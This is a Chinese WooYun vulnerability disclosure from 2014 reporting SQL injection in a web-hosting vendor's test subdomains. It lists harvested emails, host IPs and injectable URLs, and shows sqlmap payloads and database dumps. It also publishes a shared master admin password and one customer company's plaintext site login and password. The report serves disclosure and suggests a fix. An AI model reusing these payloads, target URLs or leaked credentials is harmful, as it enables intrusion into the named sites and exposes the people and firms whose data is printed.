当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077358

漏洞标题:某厂商存在SQL注入导致数万个付费网站沦陷

相关厂商:派桑网络

漏洞作者: Feei

提交时间:2014-09-29 12:29

修复时间:2014-11-13 12:30

公开时间:2014-11-13 12:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因为参数过滤不当导致SQL注入,连带导致管理后台地址泄露,导致数十台DB泄露,能拿到数万付费客户网站管理权限

详细说明:

重要信息收集:
[+] Emails found:
------------------
david@iecworld.com
admin@iecworld.com
divid@iecworld.com
[+] Hosts found in search engines:
------------------------------------
122.227.230.250:server.iecworld.com
61.130.97.52:www.iecworld.com
114.80.68.133:testweb5.iecworld.com
61.130.97.53:wiki.make.iecworld.com
114.80.67.29:testweb7.iecworld.com
114.80.68.191:testweb6.iecworld.com
61.130.97.55:shop.testweb.iecworld.com
61.130.97.53:cn.iecworld.com
61.130.97.55:testweb.iecworld.com
60.191.124.236:admin.iecworld.com
61.130.97.54:make1.iecworld.com
61.130.97.53:make.iecworld.com
60.191.124.236:is-service.iecworld.com
61.130.97.53:service.iecworld.com
60.191.124.236:is-testweb7.iecworld.com
61.130.97.52:file.iecworld.com
60.191.124.236:hk.iecworld.com
60.191.124.236:253Dcn.iecworld.com
提取有用信息:
testwebN.iecworld.com
1.上面这种域名是用来测试访问网站的(比如客户住域没有备案或者还没购买,先通过这个域名的二级目录来访问)
2.有N个这类二级域名
3.每个这类二级域名下存在数千客户网站
于是查找注入点
简单的找了下每个二级域下的SQL注入点:
testweb 61.130.97.55
http://testweb.iecworld.com/yining/admin/login.php
testweb2 61.130.97.52 主站
http://testweb2.iecworld.com/suotie/admin/login.php
testweb3 114.80.68.131
http://testweb3.iecworld.com/wangxiang/cn/products.php?tid=18&id=1
testweb4
testweb4.iecworld.com/lnr/cn/faqed.php?id=11&gid=1
testweb5
testweb6
testweb7
http://testweb7.iecworld.com/dongfang/cn/products.php?act=list&id=7
通过注入点拿到数据库权限:
---
Place: GET
Parameter: TypeLevel
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=19&TypeLevel=1 AND 8971=8971&pid=19
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: id=19&TypeLevel=1 UNION ALL SELECT NULL,CONCAT(0x7170746271,0x4d597259547178556155,0x7171707a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&pid=19
---
testweb的数据库
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[*] 'yining'@'localhost'
available databases [4]:
[*] information_schema
[*] maindb
[*] test
[*] yining
Database: maindb
[10 tables]
+---------------------------------------+
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
| t_language |
| t_log |
| t_model |
| t_plugin |
| t_progress |
| t_timeline |
+———————————————————+
testweb2的maindb库
Database: maindb
[12 tables]
+------------+
| books |
| company |
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
| t_language |
| t_log |
| t_model |
| t_plugin |
| t_progress |
| t_timeline |
+——————+
testweb3的maindb库
Database: maindb
[6 tables]
+------------+
| books |
| company |
| t_admin |
| t_bak |
| t_dict |
| t_feedback |
+------------+

1111.png


通过分析得出以下结论:
1.每个客户网站只有自己数据库权限和一个名为mainbd库的权限
2.通过分析maindb表结构发现里面竟然存了该二级域名下的所有网站相关信息(管理员帐号密码/反馈/备份/日志/插件等)
3.每个二级域的maindb库里面的的客户信息表都是t_admin,并且密码没有加密
4.每个二级域的maindb库管理员表里面都有一个admin ps99379937的管理员帐户,按理说如果是存放客户的密码,为什么会都有这个帐号呢,于是继续深入下去发现了每个二级域都有一个总的管理后台(e.g testweb2.iecworld.com/admin)

漏洞证明:

使用admin ps99379937可以登陆所有后台,如下
testweb.iecworld.com/admin (主要是11年建设的网站,共1940个客户)
testweb2.iecworld.com/admin (主要是11年建设的网站,共1689个客户)
testweb3.iecworld.com/admin (主要是11年建设的网站,共1100个客户)
testweb4.iecworld.com/admin (主要是12年建设的网站,共1143个客户)
testweb5.iecworld.com/admin (主要是11年建设的网站,共1689个客户)
testweb6.iecworld.com/admin (主要是13年建设的网站,共1273个客户)
testweb7.iecworld.com/admin (主要是13年建设的网站,共1093个客户)
testweb8.iecworld.com/admin(主要是14年建设的网站,共483个客户)
testweb9.iecworld.com/admin (主要是14年的)
testweb10.iecworld.com/admin (主要是14年的)
testweb11.iecworld.com/admin (主要是14年的)

22222.png


上面截图是其中一个二级域名的管理后台:可以看到很多机密信息
所有客户网站后台均可以登陆
从testweb的maindb.t_admin随便挑选一个用户
2644,102,宁波,朱宁斌,<blank>,lixiang,4,0,0,5000,李勇,100,lixiang,陈海啸,3lxanc85,<blank>,1,2,0,D0:D1:D2:D3:F0:F1:F2:F3:F4:F5:F6:F7:F8:F9:F10:E0:E1:E2:E3:E4:E5:E6:E7:E8:E9:E10:G0:G1:G2:G3:G4:G13:G5:G6:G7:G8:I0:I1:I2:I3:O1:O2,2009-04-30 16:24:58,http://chinalx.com,2010-02-12 00:00:00,100,宁波理想信息工程有限公司,cn/index.php,2009-02-12 00:00:00,<blank>,宁波理
想信息工程有限公司
宁波理
想信息工程有限公司(http://www.chinalx.com/)
登陆地址:http://www.chinalx.com/admin/
帐号:lixiang 密码3lxanc85

4444.png


粗略测试了下,客户案例里面大部分都能登陆并获取到网站后台权限和数据库权限甚至源码
虽然大部分都是小客户,但是也有一些大客户
点到为止,不继续挖了

修复方案:

全局过滤外部参数,或暂时先上WAF再慢慢修复

版权声明:转载请注明来源 Feei@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝